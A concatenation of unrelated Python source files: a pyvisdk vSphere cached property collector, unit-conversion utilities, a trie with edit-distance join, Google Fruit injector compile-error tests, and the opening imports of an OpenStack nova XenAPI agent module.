def _createTraversalSpec(self, managed_object_type_name, property_name, next_selector_names=[]):
""":returns: a TravelSpec object whose name is '{managed_object_type_name}.{property_name}'"""
return TraversalSpec(self._vim, name=self._guessTraversalSpecName(managed_object_type_name, property_name),
type=managed_object_type_name, path=property_name,
selectSet=[SelectionSpec(self._vim, name=name) for name in next_selector_names])
@cached_method
def _getContainerView(self):
kwargs = dict(container=self._vim.root, type=[self._managedObjectTypeName], recursive=True)
return self._vim.service_content.viewManager.CreateContainerView(**kwargs)
@cached_method
def _getObjectSet(self):
from pyvisdk.do.object_spec import ObjectSpec
return ObjectSpec(self._vim, obj=self._getContainerView().ref,
selectSet=self._getSelectSet())
@cached_method
def _getPropSet(self):
from pyvisdk.do.property_spec import PropertySpec
return [PropertySpec(self._vim, type=self._managedObjectTypeName, pathSet=self._propertiesList)]
@cached_method
def _getPropertyCollector(self):
property_collector = self._vim.service_content.propertyCollector.CreatePropertyCollector()
property_collector.CreateFilter(self._getPropertyFilterSpec(), partialUpdates=True)
return property_collector
@cached_method
def _getPropertyFilterSpec(self):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.FilterSpec.html
from pyvisdk.do.property_filter_spec import PropertyFilterSpec
return PropertyFilterSpec(self._vim, propSet=self._getPropSet(),
objectSet=[self._getObjectSet()])
@cached_method
def _getSelectSet(self):
"""This method returns a SelectSet that travels the entire heirarchy.
If you want to go over heirarchy in a more efficient way, overload this method"""
select_set = list(self._vim._buildFullTraversal())
select_set.append(self._createTraversalSpec("ContainerView", 'container',
[select.name for select in select_set]))
return select_set
def _getChanges(self, time_in_seconds=0, truncated_version=None):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.html#waitForUpdatesEx
property_collector = self._getPropertyCollector()
wait_options = WaitOptions(self._vim, maxWaitSeconds=time_in_seconds)
logger.debug("Checking for updates on property collector {!r}".format(self))
update = property_collector.WaitForUpdatesEx(truncated_version or self._version,
wait_options)
logger.debug("There is {} pending update".format('no' if update is None else 'indeed an'))
return update
def _refToString(self, ref):
return "{}:{}".format(ref._type, ref.value)
def _mergeObjectUpdateIntoCache__enter(self, object_ref_key, objectUpdate):
# Rebuild the properties dict
properties = {propertyChange.name:propertyChange.val
for propertyChange in filter(lambda propertyChange:propertyChange.op in ['add', 'assign'],
objectUpdate.changeSet)}
message = "Replacing cache for object_ref_key {} with a dictionary of the following keys {}"
logger.debug(message.format(object_ref_key, properties.keys()))
self._result[object_ref_key] = properties
def _mergeObjectUpdateIntoCache__leave(self, object_ref_key, objectUpdate=None):
# the object no longer exists, we drop it from the result dictionary
logger.debug("Removing object_ref_key {} from cache".format(object_ref_key))
_ = self._result.pop(object_ref_key, None)
def _split_property_path(self, key):
return findall(r"[A-Za-z]*\[[^\]]+\]", key)
def _walk_on_property_path(self, path):
from re import findall
matches = [Bunch(value=item) for item in findall(PROPERTY_NAME_PATTERN, path)]
for match in matches:
if match.value.startswith('['):
match.type = "key"
match.value = match.value[2:-2]
else:
match.type = "property"
return matches
def _get_list_and_object_to_update(self, property_dict, path, value, last=False):
for key in property_dict.keys():
if path.startswith(key):
break
# key is a prefix of path
if path == key:
return property_dict
object_to_update = property_dict[key]
path = path.replace(key, '').lstrip('.')
walks = self._walk_on_property_path(path)
for item in walks if last else walks[:-1]:
if item.type == "key":
object_to_update = [element for element in object_to_update if element.key == item.value][0]
else:
if isinstance(object_to_update, (dict, Bunch)):
object_to_update = object_to_update.get(item.value)
else:
object_to_update = getattr(object_to_update, item.value)
return object_to_update
def _get_property_name_to_update(self, property_dict, path):
for key in property_dict.keys():
if path == key:
return key
return self._walk_on_property_path(path)[-1].value
def _get_key_to_remove(self, key):
return self._walk_on_property_path(key)[-1].value
def _mergePropertyChange__add(self, property_dict, key, value):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
list_to_update = self._get_list_and_object_to_update(property_dict, key, value)
logger.debug("Appending {}".format(value.__class__))
list_to_update.insert(-1, value)
def _mergePropertyChange__assign(self, property_dict, key, value):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
object_to_update = self._get_list_and_object_to_update(property_dict, key, value, key.endswith(']'))
name = self._get_property_name_to_update(property_dict, key)
logger.debug("Assigning {} to {}".format(value.__class__, name))
assignment_method = getattr(object_to_update, "__setitem__", object_to_update.__setattr__)
assignment_method(name, value)
def _mergePropertyChange__remove(self, property_dict, key, value):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
list_to_update = self._get_list_and_object_to_update(property_dict, key, value)
key_to_remove = self._get_key_to_remove(key)
value = [item for item in list_to_update if item.key == key_to_remove][0]
list_to_update.remove(value)
def _mergeObjectUpdateIntoCache__modify(self, object_ref_key, objectUpdate):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.ObjectUpdate.html
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.Change.html
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.MissingProperty.html
properties = self._result[object_ref_key]
logger.debug("Modifying cache for object_ref_key {}".format(object_ref_key))
updatemethods = dict(add=self._mergePropertyChange__add,
assign=self._mergePropertyChange__assign,
remove=self._mergePropertyChange__remove,
indirectRemove=self._mergePropertyChange__remove)
for propertyChange in objectUpdate.changeSet:
logger.debug("Modifying property {}, operation {}".format(propertyChange.name, propertyChange.op))
updatemethods[propertyChange.op](properties, propertyChange.name, propertyChange.val)
for missingSet in objectUpdate.missingSet:
logger.debug("Removing from cache a property that has gone missing{}".format(missingSet.path))
self._mergePropertyChange__remove(properties, missingSet.path, None)
def _mergeObjectUpdateIntoCache(self, objectUpdate):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.ObjectUpdate.html
updateMethods = dict(enter=self._mergeObjectUpdateIntoCache__enter,
leave=self._mergeObjectUpdateIntoCache__leave,
modify=self._mergeObjectUpdateIntoCache__modify)
object_ref_key = self._refToString(objectUpdate.obj.ref)
logger.debug("Update kind {} on cache key {}".format(objectUpdate.kind, object_ref_key))
updateMethods[objectUpdate.kind](object_ref_key, objectUpdate)
def _mergeChangesIntoCache(self, update):
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.UpdateSet.html
# http://vijava.sourceforge.net/vSphereAPIDoc/ver5/ReferenceGuide/vmodl.query.PropertyCollector.FilterUpdate.html
for filterSet in update.filterSet:
for key in map(lambda missingObject: self._refToString(missingObject.obj), filterSet.missingSet):
logger.debug("Removing key {} from cache because it is missing in the filterSet".format(key))
_ = self._result.pop(key, None)
for objectUpdate in filterSet.objectSet:
self._mergeObjectUpdateIntoCache(objectUpdate)
if update.truncated:
self._mergeChangesIntoCache(self._getChanges(0, update.version))
else:
self._version = update.version
logger.debug("Cache is updated for version {}".format(self._version))
def checkForUpdates(self):
""":returns: True if the cached data is not up to date"""
return self.waitForUpdates(0)
def getProperties(self):
"""This method checks first if there are changes in the server.
If there are, the changes are merged into the cache and then returned from the cache.
If there are not, the data is returned from the cache.
:rtype: a dictionary with MoRefs as keys, and propertyName=propertyValue dictionary as values"""
update = self._getChanges()
if update is not None:
self._mergeChangesIntoCache(update)
return self.getPropertiesFromCache()
def getPropertiesFromCache(self):
""":returns: the cached properties immediately from the cache.
:rtype: a dictionary with MoRefs as keys, and propertyName=propertyValue dictionary as values"""
return self._result
def waitForUpdates(self, time_in_seconds):
"""This method is blocking a maximum time of time_in_seconds, depending if there are changes on the server.
This method does not update the cache with the changes, if there are any.
:returns: True if there are updates on the server, False if there are not."""
update = self._getChanges(time_in_seconds)
return update is not None
class HostSystemCachedPropertyCollector(CachedPropertyCollector):
"""
Facade for fetching host attributes by using a faster traversal (e.g no need to traverse inside HostSystem)
"""
def __init__(self, vim, hostProperties):
super(HostSystemCachedPropertyCollector, self).__init__(vim, 'HostSystem', hostProperties)
@cached_method
def _getSelectSet(self):
#TODO docstring
select_set = list()
select_set.append(self._createTraversalSpec("ClusterComputeResource", 'host'))
select_set.append(self._createTraversalSpec("ComputeResource", 'host'))
select_set.append(self._createTraversalSpec("Datacenter", 'hostFolder',
['Folder.childEntity']))
select_set.append(self._createTraversalSpec("Folder", 'childEntity',
['Datacenter.hostFolder', 'ClusterComputeResource.host', 'ComputeResource.host']))
select_set.append(self._createTraversalSpec("ContainerView", 'container',
[select.name for select in select_set]))
return select_set
|
|
from __future__ import division
from decimal import Decimal, getcontext
from string import ascii_lowercase, maketrans
def format_num(num, decplaces=10):
"Converts a number into a more a readable string-version."
try:
dec = Decimal(num)
# Cut the decimal off at "precision" decimal places.
if decplaces < 1:
dec = dec.quantize(Decimal("0"))
else:
# Set our precision to at least 28 or twice our precision, lest
# Decimal.quantize complains about "result has too many digits".
getcontext().prec = max(28, int(decplaces * 2))
dec = dec.quantize(Decimal(".{}".format("0" * decplaces)))
except:
return "bad"
# Split the decimal into sign, digits and exponent.
tup = dec.as_tuple()
delta = len(tup.digits) + tup.exponent
digits = "".join(str(d) for d in tup.digits)
# Put the number back together considering the delta.
if delta <= 0:
zeros = abs(tup.exponent) - len(tup.digits)
val = "0." + ("0" * zeros) + digits
else:
val = digits[:delta] + ("0" * tup.exponent) + '.' + digits[delta:]
# Strip trailing 0s and/or trailing dot:
val = val.rstrip("0")
if val[-1] == ".":
val = val[:-1]
if tup.sign:
return "-" + val
return val
def rot(message, shift=3):
"Employs the Ceasar Cipher to encode/decode messages."
alphabet = ascii_lowercase
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
table = maketrans(alphabet, shifted_alphabet)
return message.lower().translate(table)
class Base(object):
def __init__(self):
self._decimal = 0
self.alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
def from_decimal(self, n, base=10):
"Input: base10 integer. Output: base2-64 string."
try:
n = int(n)
except (ValueError, TypeError):
return "NaN"
if base < 2 or base > 64:
return "N/A"
basecases = "0123456789" + self.alphabet
if 63 <= base <= 64:
basecases = self.alphabet + "0123456789+/"
if n < base:
return basecases[n]
encoded = []
while n:
remainder, n = n % base, n // base
encoded.insert(0, basecases[remainder])
return "".join(encoded)
def to_decimal(self, s, base=10):
"Input: base2-64 string. Output: base10 integer."
try:
s = str(s)
except (ValueError, TypeError):
return "NaN"
if base < 2 or base > 64:
return "N/A"
basecases = "0123456789" + self.alphabet
if 63 <= base <= 64:
basecases = self.alphabet + "0123456789+/"
basecases = basecases[:base]
slen = len(s)
n, idx = 0, 0
# Allow lowercase letters for base11-36 (single alphabet).
if base <= 36:
s = s.upper()
for c in s:
if c not in basecases:
return "NaN"
power = slen - (idx + 1)
n += basecases.index(c) * (base ** power)
idx += 1
return n
class Data(object):
def __init__(self):
self.decplaces = 4 # Decimal points of accuracy.
self._bytes = 0
@property
def bits(self):
return format_num(self._bytes * 8, self.decplaces)
@bits.setter
def bits(self, value):
self._bytes = value / 8
@property
def bytes(self):
"8 bits"
return format_num(self._bytes, self.decplaces)
@bytes.setter
def bytes(self, value):
self._bytes = value
@property
def kilobytes(self):
"1000 bytes, kB or KB"
return format_num(self._bytes / 1000, self.decplaces)
@kilobytes.setter
def kilobytes(self, value):
self._bytes = value * 1000
@property
def megabytes(self):
"1000^2 bytes, MB"
return format_num(self._bytes / (1000 ** 2), self.decplaces)
@megabytes.setter
def megabytes(self, value):
self._bytes = value * (1000 ** 2)
@property
def gigabytes(self):
"1000^3 bytes, GB"
return format_num(self._bytes / (1000 ** 3), self.decplaces)
@gigabytes.setter
def gigabytes(self, value):
self._bytes = value * (1000 ** 3)
@property
def terrabytes(self):
"1000^4 bytes, TB"
return format_num(self._bytes / (1000 ** 4), self.decplaces)
@terrabytes.setter
def terrabytes(self, value):
self._bytes = value * (1000 ** 4)
@property
def petabytes(self):
"1000^5 bytes, PB"
return format_num(self._bytes / (1000 ** 5), self.decplaces)
@petabytes.setter
def petabytes(self, value):
self._bytes = value * (1000 ** 5)
@property
def kibibytes(self):
"1024 bytes, KiB or KB"
return format_num(self._bytes / 1024, self.decplaces)
@kibibytes.setter
def kibibytes(self, value):
self._bytes = value * 1024
@property
def mebibytes(self):
"1024^2 bytes, MiB"
return format_num(self._bytes / (1024 ** 2), self.decplaces)
@mebibytes.setter
def mebibytes(self, value):
self._bytes = value * (1024 ** 2)
@property
def gibibytes(self):
"1024^3 bytes, GiB"
return format_num(self._bytes / (1024 ** 3), self.decplaces)
@gibibytes.setter
def gibibytes(self, value):
self._bytes = value * (1024 ** 3)
@property
def tebibytes(self):
"1024^4 bytes, TiB"
return format_num(self._bytes / (1024 ** 4), self.decplaces)
@tebibytes.setter
def tebibytes(self, value):
self._bytes = value * (1024 ** 4)
@property
def pebibytes(self):
"1024^5 bytes, PiB"
return format_num(self._bytes / (1024 ** 5), self.decplaces)
@pebibytes.setter
def pebibytes(self, value):
self._bytes = value * (1024 ** 5)
class Length(object):
def __init__(self):
self.decplaces = 4 # Decimal points of accuracy.
self._meters = 0
@property
def millimeters(self):
return format_num(self._meters * 1000, self.decplaces)
@millimeters.setter
def millimeters(self, value):
self._meters = value / 1000
@property
def centimeters(self):
return format_num(self._meters * 100, self.decplaces)
@centimeters.setter
def centimeters(self, value):
self._meters = value / 100
@property
def meters(self):
return format_num(self._meters, self.decplaces)
@meters.setter
def meters(self, value):
self._meters = value
@property
def kilometers(self):
return format_num(self._meters / 1000, self.decplaces)
@kilometers.setter
def kilometers(self, value):
self._meters = value * 1000
@property
def inches(self):
return format_num(self._meters * 39.37007874, self.decplaces)
@inches.setter
def inches(self, value):
self._meters = value / 39.37007874
@property
def feet(self):
return format_num(self._meters * 3.280839895, self.decplaces)
@feet.setter
def feet(self, value):
self._meters = value / 3.280839895
@property
def yards(self):
return format_num(self._meters * 1.0936132983, self.decplaces)
@yards.setter
def yards(self, value):
self._meters = value / 1.0936132983
@property
def miles(self):
return format_num(self._meters * 0.00062137119224, self.decplaces)
@miles.setter
def miles(self, value):
self._meters = value / 0.00062137119224
class Volume(object):
def __init__(self):
# NOTE: maybe pass decplaces as an argument instead of keeping it here.
self.decplaces = 4 # Decimal points of accuracy.
self._liters = 0
@property
def milliliters(self):
return format_num(self._liters * 1000, self.decplaces)
@milliliters.setter
def milliliters(self, value):
self._liters = value / 1000
@property
def centiliters(self):
return format_num(self._liters * 100, self.decplaces)
@centiliters.setter
def centiliters(self, value):
self._liters = value / 100
@property
def liters(self):
return format_num(self._liters, self.decplaces)
@liters.setter
def liters(self, value):
self._liters = value
@property
def kiloliters(self):
return format_num(self._liters / 1000, self.decplaces)
@kiloliters.setter
def kiloliters(self, value):
self._liters = value * 1000
@property
def ounces(self):
return format_num(self._liters * 33.814022701, self.decplaces)
@ounces.setter
def ounces(self, value):
self._liters = value / 33.814022701
@property
def pints(self):
return format_num(self._liters * 2.1133764189, self.decplaces)
@pints.setter
def pints(self, value):
self._liters = value / 2.1133764189
@property
def gallons(self):
return format_num(self._liters * 0.26417205236, self.decplaces)
@gallons.setter
def gallons(self, value):
self._liters = value / 0.26417205236
@property
def barrels(self):
return format_num(self._liters * 0.0083864143603, self.decplaces)
@barrels.setter
def barrels(self, value):
self._liters = value / 0.0083864143603
class Weight(object):
def __init__(self):
# NOTE: maybe pass decplaces as an argument instead of keeping it here.
self.decplaces = 4 # Decimal points of accuracy.
self._kilograms = 0
@property
def milligrams(self):
return format_num(self._kilograms * 1000000, self.decplaces)
@milligrams.setter
def milligrams(self, value):
self._kilograms = value / 1000000
@property
def grams(self):
return format_num(self._kilograms * 1000, self.decplaces)
@grams.setter
def grams(self, value):
self._kilograms = value / 1000
@property
def kilograms(self):
return format_num(self._kilograms, self.decplaces)
@kilograms.setter
def kilograms(self, value):
self._kilograms = value
@property
def tons(self):
return format_num(self._kilograms / 1000, self.decplaces)
@tons.setter
def tons(self, value):
self._kilograms = value * 1000
@property
def drams(self):
return format_num(self._kilograms * 564.3833912, self.decplaces)
@drams.setter
def drams(self, value):
self._kilograms = value / 564.3833912
@property
def ounces(self):
return format_num(self._kilograms * 35.27396195, self.decplaces)
@ounces.setter
def ounces(self, value):
self._kilograms = value / 35.27396195
@property
def pounds(self):
return format_num(self._kilograms * 2.2046226218, self.decplaces)
@pounds.setter
def pounds(self, value):
self._kilograms = value / 2.2046226218
@property
def ustons(self):
return format_num(self._kilograms * 0.0011023113109, self.decplaces)
@ustons.setter
def ustons(self, value):
self._kilograms = value / 0.0011023113109
|
|
import itertools as it
from collections import deque
from Levenshtein import distance
from transactionaldict import TransactionalDict as tdict
class Trie:
_root = None
_terminals = None
_collection_count = None
def __init__(self):
self._root = Node(element='')
self._terminals = set()
self._collection_count = 1
def add(self, seq, collection_mask):
node = self._root
for e in seq:
node = node.add_or_fetch_child(e)
node._member_of = node._member_of | collection_mask
self._terminals.add(node)
def items(self):
for i in self._terminals:
yield i.prefix()
def longest_prefix(self, seq):
node = self._root
iter = (i for i in seq)
for i in seq:
child = node.child_by_element(i)
if not child:
break
node = child
return node
@staticmethod
def calc_active_node_set(node, parent_node_set, sigma):
active_nodes = []
for n, ed in parent_node_set.items():
if ed < sigma:
active_nodes.append((n, ed+1))
for nc in n._child_nodes:
if not nc._visited:
continue
if nc._element == node._element:
active_nodes.append((nc, ed))
if ed < sigma and nc != node:
for ncc,d in nc.breadth_first(sigma-ed):
active_nodes.append((ncc, ed+d))
elif ed < sigma:
active_nodes.append((nc, ed+1))
return dict(sorted(active_nodes, key=lambda x: x[1], reverse=True))
def trie_search(self, seq, sigma):
node = self._root
stack = [None]
while node:
if node in self._terminals and node.is_active(seq, sigma):
yield node
if not node.can_prune(seq, sigma):
for child in node:
stack.append(child)
node = stack.pop()
def _index(self, collection, collection_id):
for w in collection:
self.add(w, collection_id)
def index(self, collection1, collection2=None):
self._index(collection1, 1)
if collection2:
self._collection_count = 2
self._index(collection2, 2)
def _self_join(self, sigma):
for n in self._root.pre_order():
n._visited = False
active_node_stack = [{self._root : 0}]
self._root._visited = True
traversal_stack = [None] + [c for c in self._root]
node = traversal_stack.pop()
while node:
node._visited = True
# Calculate this node's active node set
parent_active_nodes = active_node_stack[-1]
active_node_set = self.calc_active_node_set(
node, parent_active_nodes, sigma)
# Update active node sets of ancestors
for ancestor_active_node, cnt in zip(
active_node_stack[-1:-sigma-1:-1], it.count(start=1)):
if (not node in ancestor_active_node or
cnt < ancestor_active_node[node]):
ancestor_active_node[node] = cnt
# Possibly generate results
if node in self._terminals:
for output_candidate in active_node_set:
if (output_candidate in self._terminals and
output_candidate != node):
yield (node, output_candidate)
# Push child nodes on traversal stack
traversal_stack.extend(child for child in node._child_nodes)
next_node = traversal_stack.pop()
# active_node_stack book keeping
if next_node and next_node._parent == node:
# went down
active_node_stack.append(active_node_set)
elif next_node and next_node._parent == node._parent:
# stay on same level
pass
elif next_node:
# went up
for a in node.move_up():
active_node_stack.pop()
if a._parent == next_node._parent:
break
node = next_node
def join(self, sigma):
if self._collection_count < 2:
return self._self_join(sigma)
class Node:
_child_nodes = None
_parent = None
_element = None
_member_of = None
def __init__(self, element=None, parent=None):
self._element = element
self._parent = parent
self._child_nodes = []
self._member_of = 0
def prefix(self):
stack = []
node = self
while node._parent:
stack.append(node._element)
node = node._parent
return ''.join(reversed(stack))
def add_or_fetch_child(self, element):
""" Create and/or fetch a child that has element
If this node has a child with element, then return
that child. Otherwise create a node with element,
add the node to this node and then return it.
"""
child = self.child_by_element(element)
if not child:
child = Node(element, self)
self._child_nodes.append(child)
return child
def child_by_element(self, element):
""" Return a child iff it has element """
for c in self._child_nodes:
if c._element == element:
return c
def is_active(self, test_seq, sigma):
node_prefix = self.prefix()
return distance(node_prefix, test_seq) <= sigma
def can_prune(self, test_seq, sigma):
node_prefix = self.prefix()
for i in range(len(test_seq) + 1):
prefix = test_seq[:i]
if self.is_active(prefix, sigma):
return False
return True
def is_ancestor(self, node):
for a in node.move_up():
if self == node._parent:
return True
return False
def move_up(self):
node = self
while node._parent:
yield node._parent
node = node._parent
def pre_order(self):
""" Pre_order traversal starting at the root """
node = self
stack = [None]
while node:
yield node
stack.extend(reversed(node._child_nodes))
node = stack.pop()
def breadth_first(self, max_rel_depth=None):
dq = deque((n, 1) for n in self)
while dq:
n,d = dq.popleft()
yield n,d
d_ = d + 1
if not max_rel_depth or d_ <= max_rel_depth:
for n_ in n:
dq.append((n_,d_))
def __str__(self):
return 'Node(%s)' % (self.prefix() if
self._parent else '-ROOT-',)
def __repr__(self):
return '<Node(%s)>' % (self.prefix() if
self._parent else '-ROOT-',)
def __iter__(self):
return (c for c in self._child_nodes)
|
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
from fruit_test_common import *
COMMON_DEFINITIONS = '''
#include "test_common.h"
struct X;
struct Annotation1 {};
using XAnnot1 = fruit::Annotated<Annotation1, X>;
struct Annotation2 {};
using XAnnot2 = fruit::Annotated<Annotation2, X>;
'''
class TestInjector(parameterized.TestCase):
def test_empty_injector(self):
source = '''
fruit::Component<> getComponent() {
return fruit::createComponent();
}
int main() {
fruit::Injector<> injector(getComponent);
}
'''
expect_success(
COMMON_DEFINITIONS,
source)
@parameterized.parameters([
'X',
'fruit::Annotated<Annotation1, X>',
])
def test_error_component_with_requirements(self, XAnnot):
source = '''
struct X {};
fruit::Component<fruit::Required<XAnnot>> getComponent();
void f(fruit::NormalizedComponent<XAnnot> normalizedComponent) {
fruit::Injector<XAnnot> injector(normalizedComponent, getComponent);
}
'''
expect_compile_error(
'ComponentWithRequirementsInInjectorError<XAnnot>',
'When using the two-argument constructor of Injector, the component used as second parameter must not have requirements',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
'X',
'fruit::Annotated<Annotation1, X>',
])
def test_error_declared_types_not_provided(self, XAnnot):
source = '''
struct X {
using Inject = X();
};
fruit::Component<> getEmptyComponent() {
return fruit::createComponent();
}
int main() {
fruit::NormalizedComponent<> normalizedComponent(getEmptyComponent);
fruit::Injector<XAnnot> injector(normalizedComponent, getEmptyComponent);
}
'''
expect_compile_error(
'TypesInInjectorNotProvidedError<XAnnot>',
'The types in TypesNotProvided are declared as provided by the injector, but none of the two components passed to the Injector constructor provides them.',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X', 'const X'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X>'),
])
def test_error_declared_nonconst_types_provided_as_const(self, XAnnot, ConstXAnnot):
source = '''
struct X {
using Inject = X();
};
fruit::Component<ConstXAnnot> getComponent();
int main() {
fruit::Injector<XAnnot> injector(getComponent);
}
'''
expect_generic_compile_error(
r'no matching constructor for initialization of .fruit::Injector<XAnnot>.'
r'|no matching function for call to .fruit::Injector<XAnnot>::Injector\(fruit::Component<ConstXAnnot> \(&\)\(\)\).'
# MSVC
r'|.fruit::Injector<XAnnot>::Injector.: none of the 2 overloads could convert all the argument types',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X', 'const X'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X>'),
])
def test_error_declared_nonconst_types_provided_as_const_with_normalized_component(self, XAnnot, ConstXAnnot):
source = '''
struct X {};
fruit::Component<> getEmptyComponent();
void f(fruit::NormalizedComponent<ConstXAnnot> normalizedComponent) {
fruit::Injector<XAnnot> injector(normalizedComponent, getEmptyComponent);
}
'''
expect_compile_error(
'TypesInInjectorProvidedAsConstOnlyError<XAnnot>',
'The types in TypesProvidedAsConstOnly are declared as non-const provided types by the injector',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X', 'Y'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation2, Y>'),
])
def test_injector_get_error_type_not_provided(self, XAnnot, YAnnot):
source = '''
struct X {
using Inject = X();
};
struct Y {};
fruit::Component<XAnnot> getComponent() {
return fruit::createComponent();
}
int main() {
fruit::Injector<XAnnot> injector(getComponent);
injector.get<YAnnot>();
}
'''
expect_compile_error(
'TypeNotProvidedError<YAnnot>',
'Trying to get an instance of T, but it is not provided by this Provider/Injector.',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('const X', 'X&', r'X&'),
('const X', 'X*', r'X\*'),
('const X', 'std::shared_ptr<X>', r'std::shared_ptr<X>'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X&>', r'fruit::Annotated<Annotation1, X&>'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X*>', r'fruit::Annotated<Annotation1, X\*>'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, std::shared_ptr<X>>', r'fruit::Annotated<Annotation1, std::shared_ptr<X>>'),
])
def test_injector_const_provided_type_does_not_allow_injecting_nonconst_variants(self, ConstXAnnot, XInjectorGetParam, XInjectorGetParamRegex):
source = '''
void f(fruit::Injector<ConstXAnnot> injector) {
injector.get<XInjectorGetParam>();
}
'''
expect_compile_error(
'TypeProvidedAsConstOnlyError<XInjectorGetParamRegex>',
'Trying to get an instance of T, but it is only provided as a constant by this Provider/Injector',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X', 'X'),
('X', 'const X&'),
('X', 'const X*'),
('X', 'X&'),
('X', 'X*'),
('X', 'std::shared_ptr<X>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X&>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, const X*>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X&>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, X*>'),
('fruit::Annotated<Annotation1, X>', 'fruit::Annotated<Annotation1, std::shared_ptr<X>>'),
])
def test_injector_get_ok(self, XBindingInInjector, XInjectorGetParam):
source = '''
struct X {
using Inject = X();
};
fruit::Component<XBindingInInjector> getComponent() {
return fruit::createComponent();
}
int main() {
fruit::Injector<XBindingInInjector> injector(getComponent);
auto x = injector.get<XInjectorGetParam>();
(void)x;
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('const X', 'X'),
('const X', 'const X&'),
('const X', 'const X*'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, X>'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, const X&>'),
('fruit::Annotated<Annotation1, const X>', 'fruit::Annotated<Annotation1, const X*>'),
])
def test_injector_get_const_binding_ok(self, XBindingInInjector, XInjectorGetParam):
XBindingInInjectorWithoutConst = XBindingInInjector.replace('const ', '')
source = '''
struct X {};
const X x{};
fruit::Component<XBindingInInjector> getComponent() {
return fruit::createComponent()
.bindInstance<XBindingInInjectorWithoutConst, X>(x);
}
int main() {
fruit::Injector<XBindingInInjector> injector(getComponent);
auto x = injector.get<XInjectorGetParam>();
(void)x;
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X**', r'X\*\*'),
('std::shared_ptr<X>*', r'std::shared_ptr<X>\*'),
('const std::shared_ptr<X>', r'const std::shared_ptr<X>'),
('X* const', r'X\* const'),
('const X* const', r'const X\* const'),
('std::nullptr_t', r'(std::)?nullptr(_t)?'),
('X*&', r'X\*&'),
('X(*)()', r'X(\((__cdecl)?\*\))?\((void)?\)'),
('void', r'void'),
('fruit::Annotated<Annotation1, X**>', r'X\*\*'),
])
def test_injector_get_error_type_not_injectable(self, XVariant, XVariantRegex):
source = '''
struct X {};
void f(fruit::Injector<X> injector) {
injector.get<XVariant>();
}
'''
expect_compile_error(
'NonInjectableTypeError<XVariantRegex>',
'The type T is not injectable.',
COMMON_DEFINITIONS,
source,
locals())
@parameterized.parameters([
('X[]', r'X\[\]'),
])
def test_injector_get_error_array_type(self, XVariant, XVariantRegex):
source = '''
struct X {};
void f(fruit::Injector<X> injector) {
injector.get<XVariant>();
}
'''
expect_generic_compile_error(
'function cannot return array type'
'|function returning an array'
# MSVC
'|.fruit::Injector<X>::get.: no matching overloaded function found',
COMMON_DEFINITIONS,
source,
locals())
if __name__ == '__main__':
absltest.main()
|
|
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import binascii
from distutils import version
import os
import sys
import time
import uuid
from oslo.config import cfg
from oslo.serialization import jsonutils
from oslo.utils import strutils
from nova.api.metadata import password
from nova.compute import utils as compute_utils
from nova import context
from nova import crypto
from nova import exception
from nova.i18n import _
from nova import objects
from nova.openstack.common import log as logging
from nova import utils
USE_AGENT_KEY = "xenapi_use_agent"
